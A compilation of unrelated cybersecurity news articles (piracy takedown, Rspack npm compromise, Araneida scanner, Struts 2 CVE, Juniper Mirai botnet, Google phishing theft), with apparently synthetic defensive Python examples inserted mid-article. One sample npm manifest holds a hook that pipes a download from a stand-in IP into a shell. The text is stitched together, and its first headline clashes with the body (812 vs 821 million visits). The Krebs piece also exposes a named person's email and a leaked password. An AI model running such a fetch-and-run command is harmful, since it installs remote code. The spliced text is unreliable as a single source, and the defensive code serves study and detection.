Massive live sports piracy ring with 812 million yearly visits taken offline



The Alliance for Creativity and Entertainment (ACE) has taken down one of the world’s largest live sports streaming piracy rings, with over 821 million visits last year.

ACE says the Markkystreams Vietnam-based operation was the largest illegal sports streaming service it has shut down to date. 

The piracy ring primarily targeted audiences across the United States and Canada, streaming sports events daily from all the U.S. sports leagues and global leagues of every category. ACE says this operation affected all its members, including sports tier members DAZN, beIN Sports, and Canal+.

“The shutdown of this globally notorious live sports piracy ring is a huge victory in our campaign against the piracy of live sports programs and follows other recent successful actions by ACE and law enforcement in Vietnam,” said Larissa Knapp, Executive Vice President at the Motion Picture Association (MPA), on Thursday.

“ACE’s live sports members face a unique threat when it comes to digital piracy, as live sports broadcasts lose substantial commercial value once the game ends. The takedown serves as a warning to piracy operators everywhere – including operators in live sports piracy – that ACE will identify and shut down their illegal operations.”

The anti-piracy group says the ring’s Hanoi-based operators handed over control of 138 domains, including the bestsolaris[dot]com, streameast[dot]to, markkystreams[dot]com, crackstreams[dot]dev, and weakspell[dot]to domains.

“This website is no longer available due to copyright infringement. Do not put yourself at risk by using or subscribing to illegal streaming services,” a banner displayed on the seized websites reads.

ACE seizure banner (BleepingComputer)

ACE is a coalition of over 50 media and entertainment companies, including the world’s largest film studios and television networks, focused on shuttering illegal streaming services since June 2017.

Its governing board includes Amazon, Apple TV+, Universal Studios, The Walt Disney Studios, Netflix, Paramount Global, Sony Pictures, and Warner Bros. Discovery.

Since its launch, ACE has taken down a long list of piracy platforms, including the Openload and Streamango streaming providers in October 2019, the pirate IPTV service Beast IPTV in December 2020, the 123movies.la streaming site in May 2021, and the world’s largest anime pirate site Zoro.to in July 2023.

ACE also works with law enforcement organizations like the U.S. Department of Justice, Europol, and Interpol in operations targeting large-scale illegal streaming rings.

Since the start of the year, it helped shutter a pirate TV streaming network that made millions of dollars since its launch in 2015, convict five men linked to the Jetflicks illegal streaming service, and, most recently, dismantle a pirate streaming service with over 22 million users worldwide that was making over €250 million ($263M) each month.


Rspack npm Packages Compromised with Crypto Mining Malware in Supply Chain Attack


Dec 20, 2024 | Ravie Lakshmanan | Malware / Supply Chain Attack


The developers of Rspack have revealed that two of their npm packages, @rspack/core and @rspack/cli, were compromised in a software supply chain attack that allowed a malicious actor to publish malicious versions to the official package registry with cryptocurrency mining malware.

Following the discovery, versions 1.1.7 of both libraries have been unpublished from the npm registry. The latest safe version is 1.1.8.

“They were released by an attacker who gained unauthorized npm publishing access, and contain malicious scripts,” software supply chain security firm Socket said in an analysis.


Rspack is billed as an alternative to webpack, offering a “high performance JavaScript bundler written in Rust.” Originally developed by ByteDance, it has since been adopted by several companies such as Alibaba, Amazon, Discord, and Microsoft, among others.

The npm packages in question, @rspack/core and @rspack/cli, attract weekly downloads of over 300,000 and 145,000, respectively, indicative of their popularity.

An analysis of the rogue versions of the two libraries has revealed that they incorporate code to make calls to a remote server (“80.78.28[.]72”) in order to transmit sensitive configuration details such as cloud service credentials, while also collecting IP address and location details by making an HTTP GET request to “ipinfo[.]io/json.”

In an interesting twist, the attack also limits the infection to machines located in a specific set of countries, such as China, Russia, Hong Kong, Belarus, and Iran.

The end goal of the attacks is to trigger the download and execution of an XMRig cryptocurrency miner on compromised Linux hosts upon installation of the packages by means of a postinstall script specified in the “package.json” file.

“The malware is executed via the postinstall script, which runs automatically when the package is installed,” Socket said. “This ensures the malicious payload is executed without any user action, embedding itself into the target environment.”
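An added example, not code from the article, from Socket or from the Rspack project: a small Python audit that flags package manifests carrying install-time lifecycle hooks, the mechanism the malicious 1.1.7 releases relied on to run without any user action. The manifest contents, the hypothetical hook commands and the SUSPICIOUS pattern are constructed assumptions; only the package names and version numbers come from the article.

```python
"""Audit npm package.json manifests for lifecycle hooks that npm runs automatically
during install. Added example; manifests below are constructed in-memory. In practice
you would load each node_modules/<package>/package.json (or inspect the tarball
before installing)."""
import re

# npm executes these hooks on `npm install` without prompting.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Versions the article reports as compromised (1.1.8 is the first clean release).
KNOWN_BAD = {"@rspack/core": {"1.1.7"}, "@rspack/cli": {"1.1.7"}}

# Shell fragments in a hook that warrant a closer look: downloads, decoding,
# detached execution, staging in /tmp. Heuristic, not a verdict.
SUSPICIOUS = re.compile(r"(curl|wget|base64|eval|nohup|chmod \+x|/tmp/)", re.IGNORECASE)


def audit_manifest(manifest: dict) -> list:
    """Return human-readable findings for one parsed package.json."""
    name = manifest.get("name", "<unknown>")
    version = manifest.get("version", "")
    findings = []
    if version in KNOWN_BAD.get(name, set()):
        findings.append(f"{name}@{version}: version listed as compromised")
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        level = "SUSPICIOUS" if SUSPICIOUS.search(cmd) else "info"
        findings.append(f"{name}@{version}: {hook} hook ({level}): {cmd}")
    return findings


def audit_all(manifests) -> list:
    """Flatten findings across a list of manifests."""
    out = []
    for m in manifests:
        out.extend(audit_manifest(m))
    return out


# Constructed sample manifests. The hook commands are hypothetical, not the real
# contents of any published package.
SAMPLE_MANIFESTS = [
    {"name": "@rspack/core", "version": "1.1.7",
     "scripts": {"postinstall": "node ./support/postinstall.js"}},
    {"name": "@rspack/core", "version": "1.1.8", "scripts": {}},
    {"name": "some-helper", "version": "2.0.0",
     "scripts": {"postinstall": "curl -s http://203.0.113.5/x | sh"}},
    {"name": "native-binding", "version": "0.1.0",
     "scripts": {"postinstall": "node install.js"}},
]

if __name__ == "__main__":
    for line in audit_all(SAMPLE_MANIFESTS):
        print(line)
```

Installing with npm install --ignore-scripts (or ignore-scripts=true in .npmrc) blocks this whole class of payload outright, at the cost of breaking packages that legitimately need a postinstall step, so run an audit like this first and allow hooks deliberately rather than by default.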


Besides publishing a new version of the two packages sans the malicious code, the project maintainers said they invalidated all existing npm tokens and GitHub tokens, checked the permissions of the repository and npm packages, and audited the source code for any potential vulnerabilities. An investigation into the root cause of the token theft is underway.

“This attack highlights the need for package managers to adopt stricter safeguards to protect developers, like enforcing attestation checks, to prevent updating to unverified versions,” Socket said. “But it’s not totally bullet-proof.”

“As seen in the recent Ultralytics supply chain attack in the Python ecosystem, attackers may still be able to publish versions with attestation by compromising GitHub Actions through cache poisoning.”


Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm – Krebs on Security


Cybercriminals are selling hundreds of thousands of credential sets stolen with the help of a cracked version of Acunetix, a powerful commercial web app vulnerability scanner, new research finds. The cracked software is being resold as a cloud-based attack tool by at least two different services, one of which KrebsOnSecurity traced to an information technology firm based in Turkey.

Araneida Scanner.

Cyber threat analysts at Silent Push said they recently received reports from a partner organization that identified an aggressive scanning effort against their website using an Internet address previously associated with a campaign by FIN7, a notorious Russia-based hacking group.

But on closer inspection they discovered the address contained an HTML title of “Araneida Customer Panel,” and found they could search on that text string to find dozens of unique addresses hosting the same service.

It soon became apparent that Araneida was being resold as a cloud-based service using a cracked version of Acunetix, allowing paying customers to conduct offensive reconnaissance on potential target websites, scrape user data, and find vulnerabilities for exploitation.

Silent Push also learned Araneida bundles its service with a robust proxy offering, so that customer scans appear to come from Internet addresses that are randomly selected from a large pool of available traffic relays.

The makers of Acunetix, Texas-based application security vendor Invicti Security, confirmed Silent Push’s findings, saying someone had figured out how to crack the free trial version of the software so that it runs without a valid license key.

“We have been playing cat and mouse for a while with these guys,” said Matt Sciberras, chief information security officer at Invicti.

Silent Push said Araneida is being advertised by an eponymous user on multiple cybercrime forums. The service’s Telegram channel boasts nearly 500 subscribers and explains how to use the tool for malicious purposes.

In a “Fun Facts” list posted to the channel in late September, Araneida said their service was used to take over more than 30,000 websites in just six months, and that one customer used it to buy a Porsche with the payment card data (“dumps”) they sold.

Araneida Scanner’s Telegram channel bragging about how customers are using the service for cybercrime.

“They are constantly bragging with their community about the crimes that are being committed, how it’s making criminals money,” said Zach Edwards, a senior threat researcher at Silent Push. “They are also selling bulk data and dumps which appear to have been acquired with this tool or due to vulnerabilities found with the tool.”

Silent Push also found a cracked version of Acunetix was powering at least 20 instances of a similar cloud-based vulnerability testing service catering to Mandarin speakers, but they were unable to find any apparently related sales threads about them on the dark web.

Rumors of a cracked version of Acunetix being used by attackers surfaced in June 2023 on Twitter/X, when researchers first posited a connection between observed scanning activity and Araneida.

According to an August 2023 report (PDF) from the U.S. Department of Health and Human Services (HHS), Acunetix (presumably a cracked version) is among several tools used by APT 41, a prolific Chinese state-sponsored hacking group.

THE TURKISH CONNECTION

Silent Push notes that the website where Araneida is being sold — araneida[.]co — first came online in February 2023. But a review of this Araneida nickname on the cybercrime forums shows they have been active in the criminal hacking scene since at least 2018.

A search in the threat intelligence platform Intel 471 shows a user by the name Araneida promoted the scanner on two cybercrime forums since 2022, including Breached and Nulled. In 2022, Araneida told fellow Breached members they could be reached on Discord at the username “Ornie#9811.”

According to Intel 471, this same Discord account was advertised in 2019 by a person on the cybercrime forum Cracked who used the monikers “ORN” and “ori0n.” The user “ori0n” mentioned in several posts that they could be reached on Telegram at the username “@sirorny.”

Orn advertising Araneida Scanner in Feb. 2023 on the forum Cracked. Image: Ke-la.com.

The Sirorny Telegram identity also was referenced as a point of contact for a current user on the cybercrime forum Nulled who is selling website development services, and who references araneida[.]co as one of their projects. That user, “Exorn,” has posts dating back to August 2018.

In early 2020, Exorn promoted a website called “orndorks[.]com,” which they described as a service for automating the scanning for web-based vulnerabilities. A passive DNS lookup on this domain at DomainTools.com shows that its email records pointed to the address ori0nbusiness@protonmail.com.

Constella Intelligence, a company that tracks information exposed in data breaches, finds this email address was used to register an account at Breachforums in July 2024 under the nickname “Ornie.” Constella also finds the same email registered at the website netguard[.]codes in 2021 using the password “ceza2003” [full disclosure: Constella is currently an advertiser on KrebsOnSecurity].

A search on the password ceza2003 in Constella finds roughly a dozen email addresses that used it in an exposed data breach, most of them featuring some variation on the name “altugsara,” including altugsara321@gmail.com. Constella further finds altugsara321@gmail.com was used to create an account at the cybercrime community RaidForums under the username “ori0n,” from an Internet address in Istanbul.

According to DomainTools, altugsara321@gmail.com was used in 2020 to register the domain name altugsara[.]com. Archive.org’s history for that domain shows that in 2021 it featured a website for a then 18-year-old Altuğ Şara from Ankara, Turkey.

Archive.org’s recollection of what altugsara dot com looked like in 2021.

LinkedIn finds this same altugsara[.]com domain listed in the “contact info” section of a profile for an Altug Sara from Ankara, who says he has worked the past two years as a senior software developer for a Turkish IT firm called Bilitro Yazilim.

Neither Altug Sara nor Bilitro Yazilim responded to requests for comment.

Invicti’s website states that it has offices in Ankara, but the company’s CEO said none of their employees recognized either name.

“We do have a small team in Ankara, but as far as I know we have no connection to the individual other than the fact that they are also in Ankara,” Invicti CEO Neil Roseman told KrebsOnSecurity.

Researchers at Silent Push say despite Araneida using a seemingly endless supply of proxies to mask the true location of its users, it is a fairly “noisy” scanner that will kick off a large volume of requests to various API endpoints, and make requests to random URLs associated with different content management systems.

What’s more, the cracked version of Acunetix being resold to cybercriminals invokes legacy Acunetix SSL certificates on active control panels, which Silent Push says provides a solid pivot for finding some of this infrastructure, particularly from the Chinese threat actors.

Further reading: Silent Push’s research on Araneida Scanner.


Techie fluked a fix and his abusive boss embraced him for it • The Register


On Call Digital technology remains frighteningly finicky, which is why good tech support people are always in demand – and also the reason The Register never tires of telling your support stories each Friday in On Call, the column your generosity makes possible.

This week, meet a reader we’ll Regomize as “Boris” who years ago worked for a business providing services to what he described as “a large international automotive company” that ran its production planning application on an old school mainframe – proper supervillain lair kit, with big tape drives whirring away all day.

The IT director at this client had a temper.

“He was known and feared as someone who ate systems support people for breakfast.”

Boris was therefore far from thrilled when he was called in to address a problem his colleagues had been unable to address.

“The planning application would sometimes suddenly hang at random points without any obvious reason,” Boris told On Call. “This was very upsetting as delays in the availability of manufacturing schedules interfered with plant operations, which cost serious money.”

Hardware experts were put on trans-Atlantic flights so they could pore over the mainframe’s innards. Software engineers who had hand-coded the machine’s OS were sent to find faults.

None could determine the cause of the hangs. Indeed, all reported the machine was working as intended. All systems nominal.

Those investigations consumed months – and did not make the client happier.

Indeed, the irate IT director began making serious noises about seeking compensation and junking the mainframe.

In desperation, Boris was asked to examine the situation.

Boris wasn’t thrilled about that, as his skill set – engineering and scientific matters – was not obviously applicable to the situation. And he knew nothing about scheduling assembly lines.

He nonetheless visited the client’s office, and was quickly “shouted at and threatened by the IT director.”

Boris managed to retain sufficient composure to ask for the application’s source code.

“Fortuitously it was in Fortran – one of the programming languages I was very familiar with,” Boris told On Call. It also contained an obvious error that he spotted after about ten minutes.

“The code assumed that all the tapes were at their start point. Whether or not the program would run successfully depended on the state of the tapes left by any previously executed application. Sometimes it would run, and sometimes not.”

The fix seemed simple: a Rewind All; statement in the code – one at the start and one at the end – would surely ensure the tape was always at the start point when the application ran.

Boris recompiled the software, ran it, and relaxed as the problem went away.

Which is where his troubles began – because the abusive IT director took a shine to him.

“Forever after I was his ‘go to’ person for advice on almost everything from hardware selection decisions to application development and I was treated with reverence and the appropriate level of respect by all.”

But Boris knew this couldn’t last – because his Fortran fix was fortuitous. He therefore lived in fear of being found out and ending up on the wrong side of the abusive IT director’s wrath.

“Fortunately, I was moved overseas on a different project before my limitations could be tested,” he told On Call.

Phew!

Have you ever found a fix despite not being an expert in the troubled tech you were asked to tend? If so, click here to send On Call an email so we can feature your story after the festive season.

On Call wishes readers all the best for their end-of-year celebrations, and thanks you all for the weekly gift of your stories. ®


Study finds ‘significant uptick’ in cybersecurity disclosures to SEC


The introduction of new cybersecurity disclosure rules by the U.S. Securities and Exchange Commission has led to a significant uptick in the number of reported cybersecurity incidents from public companies, according to a leading U.S. law firm that specializes in finance and M&A activity.

Analysis by Paul Hastings LLP found that since the disclosure law went into effect in 2023, there has been a 60% increase in disclosures of cybersecurity incidents, and 78% of disclosures were made within eight days of discovery of the incident.

The regulations require public companies to disclose material cybersecurity incidents within four business days of determining their materiality, aiming to provide investors with timely and relevant information that could impact investment decisions.

Despite the increase in disclosures, less than 10% of disclosures detailed the material impacts of these incidents, revealing potential hesitancy or difficulty in assessing comprehensive impacts swiftly. Companies are often faced with the challenge of balancing detailed reporting with the protection of sensitive operation details, as the rules do not mandate disclosing specific technical details that could hinder remediation efforts.

Michelle Reed, co-chair of Paul Hastings’ data privacy and cybersecurity practice, said the hesitancy is likely because companies are disclosing very quickly, so as to not be penalized by the SEC for delayed disclosure.

“The coming year will be an interesting testing ground on how materiality in the cyber world ultimately shakes out,” Reed told CyberScoop. 

The materiality clause has led to inconsistent outcomes among companies that have publicly disclosed a cybersecurity incident. For instance, the ransomware attack on automotive software provider CDK Global in June resulted in varying degrees of materiality disclosures. CDK’s parent company, Brookfield Business Partners, said in their July disclosure they did not “expect this incident to have a material impact” on their business despite paying a $25 million ransom.

Some other car dealerships also filed disclosures saying the attack on CDK negatively impacted their company, but stopped short of saying the incident caused a “material impact.” 

Reed told CyberScoop these cases illuminate the ambiguity companies face in determining the depth of information necessary for reporting, while avoiding the disclosure of sensitive security measures that could exacerbate vulnerabilities and lead to lawsuits.

“Materiality is a sliding scale, weighing risk and likelihood of impact,” she said. “The exact same breach could happen to two different companies, and based on size of the company and effectiveness of their incident response, one may have to disclose and the other may not.” 

An additional concern covered in the report is the prevalence of third-party breaches, which account for 1 in 4 incidents. The report points out this kind of cybersecurity incident leads to further dilemmas for companies on whether to disclose third-party breaches, particularly when other companies may have disclosed an incident related to the same breach.   

You can read the full report on Paul Hastings’ website


Written by Greg Otto

Greg Otto is Editor-in-Chief of CyberScoop, overseeing all editorial content for the website. Greg has led cybersecurity coverage that has won various awards, including accolades from the Society of Professional Journalists and the American Society of Business Publication Editors. Prior to joining Scoop News Group, Greg worked for the Washington Business Journal, U.S. News & World Report and WTOP Radio. He has a degree in broadcast journalism from Temple University.


Orgs Scramble to Fix Actively Exploited Bug in Struts 2


A critical, stubborn new vulnerability in Apache Struts 2 may be under active exploitation already, and fixing it isn’t as simple as downloading a patch.

Struts 2 is an open source (OSS) framework for building Java applications. Though long past its prime, Struts 2 remains common in older legacy systems across industries. In fact, its prevalence combined with its age is what makes its newly discovered vulnerability — CVE-2024-53677, CVSS 9.5 — so tricky. As its components have withered, and newer technologies and security practices have moved on, fixing any newly arising issues like this can require more than just a standard patch.

“The risk lies in the fact that older applications are less likely to be integrated with a modern CI/CD pipeline,” explains Chris Wysopal, chief security evangelist at Veracode. “As a result, updating the Struts 2 library, building and deploying a new version of a vulnerable application requires more manual effort and takes significantly longer. This significant effort will result in a longer window of vulnerability, during which attackers may exploit and take advantage of this weakness.”

He assesses that “It is likely that we will see the exploitation of this vulnerability for weeks as organizations find and fix all instances of Struts 2 usage.”


RCE Bug in Apache Struts 2

This same time last year, nearly to the day, a Struts 2 vulnerability with a “critical” 9.8 score in the Common Vulnerability Scoring System (CVSS) was disclosed to the public. CVE-2023-50164 resulted from attackers’ ability to manipulate file upload parameters, opening the door to path traversal. Under certain conditions an attacker could upload a specially crafted malicious script in order to achieve remote code execution (RCE) on a server.

CVE-2024-53677 is effectively CVE-2023-50164 all over again. It, too, lies in Struts 2’s File Upload Interceptor component, responsible for handling file uploads, and enables RCE via path traversal. In a blog post, Johannes Ullrich of the SANS Institute speculated that an inadequate patch for CVE-2023-50164 led to this latest deja vu.

He also observed active exploitation attempts from one IP address, which utilized a public proof-of-concept (PoC). The attacker played with the vulnerability by uploading “a one-liner script that is supposed to return ‘Apache Struts.’ Next, the attacker attempts to find the uploaded script. The exploit attempt is very close to the original PoC. Since then, a slightly improved exploit has been uploaded to the same GitHub repository,” he wrote.


Typically in situations such as this, organizations are advised to apply patches as soon as possible. In the case of CVE-2024-53677, the story isn’t quite as simple.

Organizations do need to upgrade to the latest version of Struts, 6.7.0 — or, at least, 6.4.0, released in the wake of CVE-2023-50164, which deprecated the File Upload Interceptor at issue. The fix isn’t backwards compatible, however, Apache noted in its security bulletin. IT teams will need to migrate to the newfangled Action File Upload Interceptor, and adjust how their existing applications handle file uploads by diligently rewriting their code to make use of it.

“It’s not a simple version bump,” warns Saeed Abbasi, manager of vulnerability research at Qualys. “It requires code rewrites, configuration adjustments, and can break existing logic and dependencies. In complex environments, removing all traces of the legacy interceptor poses significant challenges due to intricate plugin chains and layered frameworks. This complexity is further compounded by the need for extensive regression testing.”
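An added example, not Struts code and not anything from the Apache bulletin: the check any file-upload handler needs against the traversal class behind CVE-2024-53677, shown in Python with the trusting pattern beside the hardened one. The upload directory, the allowed suffixes and the filename policy are assumptions; the point is that the server derives the destination itself and verifies it stays inside the upload root rather than honouring whatever name the client supplied.

```python
"""Vulnerable-versus-hardened handling of a client-supplied upload filename.
Added example; the upload root and policy are assumed values. posixpath is used
so the path arithmetic is deterministic on any host."""
import posixpath as pp
import re

UPLOAD_ROOT = "/srv/app/uploads"  # assumed destination directory
# Basename must start alphanumeric (blocks dot-files and "..") and use a tight charset.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$")
ALLOWED_SUFFIXES = {".png", ".jpg", ".pdf"}


def escapes_root(dest: str, root: str = UPLOAD_ROOT) -> bool:
    """True when the normalised destination lies outside root (or is root itself)."""
    root = pp.normpath(root)
    dest = pp.normpath(dest)
    return dest == root or pp.commonpath([root, dest]) != root


def vulnerable_destination(client_filename: str) -> str:
    """'Before' pattern: the client-supplied name is joined to the upload dir as-is,
    so '../' segments and absolute paths land wherever the client chose."""
    return pp.join(UPLOAD_ROOT, client_filename)


def safe_destination(client_filename: str) -> str:
    """Hardened pattern: strip directories, whitelist the name, re-check the result."""
    # 1. Discard any directory part the client sent (either separator style).
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    # 2. Whitelist the characters and the extension; never trust a declared content type.
    if not SAFE_NAME.match(name):
        raise ValueError(f"rejected filename: {client_filename!r}")
    if pp.splitext(name)[1].lower() not in ALLOWED_SUFFIXES:
        raise ValueError(f"disallowed extension: {name!r}")
    # 3. Defence in depth: confirm the final path is still inside the upload root.
    dest = pp.join(UPLOAD_ROOT, name)
    if escapes_root(dest):
        raise ValueError(f"path escapes upload root: {dest}")
    return dest


if __name__ == "__main__":
    for candidate in ("report.pdf", "../../outside.pdf", "/etc/passwd", "shell.jsp"):
        where = "ESCAPES" if escapes_root(vulnerable_destination(candidate)) else "inside"
        print(f"{candidate!r}: naive join -> {where}")
        try:
            print("    hardened ->", safe_destination(candidate))
        except ValueError as exc:
            print("    hardened -> rejected:", exc)
```

Note that the hardened path also neutralises traversal in a name it ultimately accepts (a client sending ../../outside.pdf simply gets outside.pdf under the upload root); the explicit escapes_root check at the end is there so a future change to steps 1 or 2 cannot silently reopen the hole.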

The Potential Scope of Impact for CVE-2024-53677

The national centers for cybersecurity in Australia, Belgium, Canada, Singapore, and the UK have all released urgent security warnings regarding CVE-2024-53677. That this issue has attracted so much attention may not be obvious at first, since Struts 2 is so rarely used by developers today. It does, however, live on in legacy systems worldwide.


In the 2000s, Struts 2 was king among Java Web frameworks. By 2007 it was receiving nearly 350,000 downloads per month. Its webpage received millions of monthly visits, even its newsletter had thousands of subscribers. Today, Wysopal says, “It no longer has mainstream appeal and is rarely chosen for new projects. Its presence is more an artifact of historical adoption rather than active popularity.”

“Its ‘kingdom’ is confined to those stable, older applications in conservative industries — particularly finance, insurance, government, and large-scale manufacturing or logistics — often in organizations and regions that are regulated and less likely to modernize,” he says. Case in point: a Struts 2 vulnerability was at the heart of the infamous 2017 Equifax breach.

Just how common is Struts 2 in legacy systems in 2024? Abbasi reports that within the first 24 hours following the disclosure of CVE-2024-53677, Qualys “observed tens of thousands of vulnerable instances, reflecting the breadth and urgency of the challenge.”

To his view, “The persistence of Struts 2 in critical systems, long after more secure frameworks have emerged, illustrates the ongoing struggle enterprises face with technical debt. Many organizations run versions of Struts past their end-of-life, without proper planning which compounds the impact of new vulnerabilities. Enterprises need solid attack surface management, along with lifecycle management strategies, ensuring that critical frameworks are regularly updated, and deprecated components are swiftly phased out.”


Juniper warns of Mirai botnet targeting Session Smart routers


Juniper Networks has warned customers of Mirai malware attacks targeting and infecting Session Smart routers using default credentials.

As the networking infrastructure company explained, the malware scans for devices with default login credentials and executes commands remotely after gaining access, enabling a wide range of malicious activities.

The campaign was first observed on December 11, when the first infected routers were found on customers’ networks. Later, the operators of this Mirai-based botnet used the compromised devices to launch distributed denial-of-service (DDoS) attacks.

“On Wednesday, December 11, 2024, several customers reported suspicious behavior on their Session Smart Network (SSN) platforms,” says a security advisory published this Tuesday.

“Any customer not following recommended best practices and still using default passwords can be considered compromised as the default SSR passwords have been added to the virus database.”

Juniper also shared indicators of compromise admins should look for on their networks and devices to detect potential Mirai malware activity, including:

  • scans for devices on common Layer 4 ports (e.g., 23, 2323, 80, 8080),
  • failed login attempts on SSH services indicative of brute-force attacks,
  • sudden spike in outbound traffic volume hinting at devices being co-opted in DDoS attacks,
  • devices rebooting or behaving erratically, suggesting they’ve been compromised,
  • SSH connections from known malicious IP addresses.
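An added example, not Juniper’s advisory tooling: a Python pass over constructed sshd-style log lines that applies two of the indicators listed above, a burst of failed logins from one source followed by a success, and any SSH login from an address on a blocklist. The log lines, the threshold of five failures and the blocklist entry are all assumptions; adapt the regular expression to what the SSR platform actually logs.

```python
"""Flag SSH brute-force bursts and logins from blocklisted addresses in auth logs.
Added example; the log text below is constructed (documentation IP ranges) and
mimics Linux sshd syslog output, which is an assumption about the log source."""
import re
from collections import Counter, defaultdict

SAMPLE_LOG = """\
Dec 11 03:14:01 ssr1 sshd[2101]: Failed password for root from 198.51.100.7 port 51022 ssh2
Dec 11 03:14:02 ssr1 sshd[2101]: Failed password for admin from 198.51.100.7 port 51023 ssh2
Dec 11 03:14:02 ssr1 sshd[2101]: Failed password for admin from 198.51.100.7 port 51024 ssh2
Dec 11 03:14:03 ssr1 sshd[2101]: Failed password for root from 198.51.100.7 port 51025 ssh2
Dec 11 03:14:04 ssr1 sshd[2101]: Failed password for user from 198.51.100.7 port 51026 ssh2
Dec 11 03:14:05 ssr1 sshd[2101]: Failed password for support from 198.51.100.7 port 51027 ssh2
Dec 11 03:14:09 ssr1 sshd[2101]: Accepted password for admin from 198.51.100.7 port 51031 ssh2
Dec 11 03:20:11 ssr1 sshd[2188]: Accepted publickey for ops from 192.0.2.10 port 40210 ssh2
Dec 11 03:22:40 ssr1 sshd[2190]: Accepted password for admin from 203.0.113.77 port 44444 ssh2
"""

# Placeholder blocklist; in practice populate this from a threat-intelligence feed.
KNOWN_BAD_IPS = {"203.0.113.77"}

LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?:password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)

FAIL_THRESHOLD = 5  # assumed cut-off for calling a run of failures a brute-force attempt


def analyse(log_text: str) -> dict:
    """Return brute-force sources, the usernames each tried, sources that succeeded
    after a burst of failures, and any login from a blocklisted address."""
    failures = Counter()
    users_tried = defaultdict(set)
    success_after_failures = set()
    known_bad = set()
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        ip, user, result = m["ip"], m["user"], m["result"]
        if ip in KNOWN_BAD_IPS:
            known_bad.add(ip)
        if result == "Failed":
            failures[ip] += 1
            users_tried[ip].add(user)
        elif failures[ip] >= FAIL_THRESHOLD:
            # A success right after a burst of failures is the signature of a
            # default or weak credential being guessed.
            success_after_failures.add(ip)
    return {
        "brute_force": {ip: n for ip, n in failures.items() if n >= FAIL_THRESHOLD},
        "usernames_per_ip": {ip: sorted(u) for ip, u in users_tried.items()},
        "success_after_bruteforce": sorted(success_after_failures),
        "known_bad_logins": sorted(known_bad),
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The success-after-failures case is the one to page on: a device that accepted a password after a guessing run is, in the advisory’s own terms, to be considered compromised and reimaged rather than merely re-credentialed.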

The company advised customers to immediately ensure their devices follow recommended username and password policies, including changing the default credentials on all Session Smart routers and using unique and strong passwords across all devices.

Admins are also recommended to keep firmware updated, review access logs for anomalies, set alerts automatically triggered when suspicious activity is detected, deploy intrusion detection systems to monitor network activity, and use firewalls to block unauthorized access to Internet-exposed devices.

Juniper also warned that routers already infected in these attacks must be reimaged before being brought back online.

“If a system is found to be infected, the only certain way of stopping the threat is by reimaging the system as it cannot be determined exactly what might have been changed or obtained from the device,” Juniper said.

Last year, in August, the ShadowServer threat monitoring service warned of ongoing attacks targeting a critical remote code execution exploit chain impacting Juniper EX switches and SRX firewalls using a watchTowr Labs proof-of-concept (PoC) exploit.

Since then, Juniper also warned of a critical RCE bug in its firewalls and switches in January and released an out-of-cycle patch for a maximum-severity authentication bypass flaw in its Session Smart Router (SSR), Session Smart Conductor, and WAN Assurance Router products.


Juniper Warns of Mirai Botnet Targeting SSR Devices with Default Passwords


Dec 19, 2024 | Ravie Lakshmanan | Malware / Botnet


Juniper Networks is warning that Session Smart Router (SSR) products with default passwords are being targeted as part of a malicious campaign that deploys the Mirai botnet malware.

The company said it’s issuing the advisory after “several customers” reported anomalous behavior on their Session Smart Network (SSN) platforms on December 11, 2024.

“These systems have been infected with the Mirai malware and were subsequently used as a DDOS attack source to other devices accessible by their network,” it said. “The impacted systems were all using default passwords.”

Mirai, whose source code was leaked in 2016, has spawned several variants over the years. The malware is capable of scanning for known vulnerabilities as well as default credentials to infiltrate devices and enlist them into a botnet for mounting distributed denial-of-service (DDoS) attacks.

To mitigate such threats, organizations are recommended to change their passwords with immediate effect to strong, unique ones (if not already), periodically audit access logs for signs of suspicious activity, use firewalls to block unauthorized access, and keep software up-to-date.


Some of the indicators associated with Mirai attacks include unusual port scanning, frequent SSH login attempts indicating brute-force attacks, increased outbound traffic volume to unexpected IP addresses, random reboots, and connections from known malicious IP addresses.

“If a system is found to be infected, the only certain way of stopping the threat is by reimaging the system as it cannot be determined exactly what might have been changed or obtained from the device,” the company said.

The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that poorly managed Linux servers, particularly publicly exposed SSH services, are being targeted by a previously undocumented DDoS malware family dubbed cShell.

“cShell is developed in the Go language and is characterized by exploiting Linux tools called screen and hping3 to perform DDoS attacks,” ASEC said.


How to Lose a Fortune with Just One Bad Click – Krebs on Security


Image: Shutterstock, iHaMoo.

Adam Griffin is still in disbelief over how quickly he was robbed of nearly $500,000 in cryptocurrencies. A scammer called using a real Google phone number to warn his Gmail account was being hacked, sent email security alerts directly from google.com, and ultimately seized control over the account by convincing him to click “yes” to a Google prompt on his mobile device.

Griffin is a battalion chief firefighter in the Seattle area, and on May 6 he received a call from someone claiming they were from Google support saying his account was being accessed from Germany. A Google search on the phone number calling him — (650) 203-0000 — revealed it was an official number for Google Assistant, an AI-based service that can engage in two-way conversations.

At the same time, he received an email that came from a google.com email address, warning his Google account was compromised. The message included a “Google Support Case ID number” and information about the Google representative supposedly talking to him on the phone, stating the rep’s name as “Ashton” — the same name given by the caller.

Griffin didn’t learn this until much later, but the email he received had a real google.com address because it was sent via Google Forms, a service available to all Google Docs users that makes it easy to send surveys, quizzes and other communications.

A phony security alert Griffin received prior to his bitcoin heist, via Google Forms.

According to tripwire.com’s Graham Cluley, phishers use Google Forms to create a security alert message, then change the form’s settings to automatically send a copy of the completed form to whatever email address is entered into the form. The attacker then sends an invitation to complete the form to themselves, not to their intended victim.

“So, the attacker receives the invitation to fill out the form – and when they complete it, they enter their intended victim’s email address into the form, not their own,” Cluley wrote in a December 2023 post. “The attackers are taking advantage of the fact that the emails are being sent out directly by Google Forms (from the google.com domain). It’s an established legitimate domain that helps to make the email look more legitimate and is less likely to be intercepted en route by email-filtering solutions.”

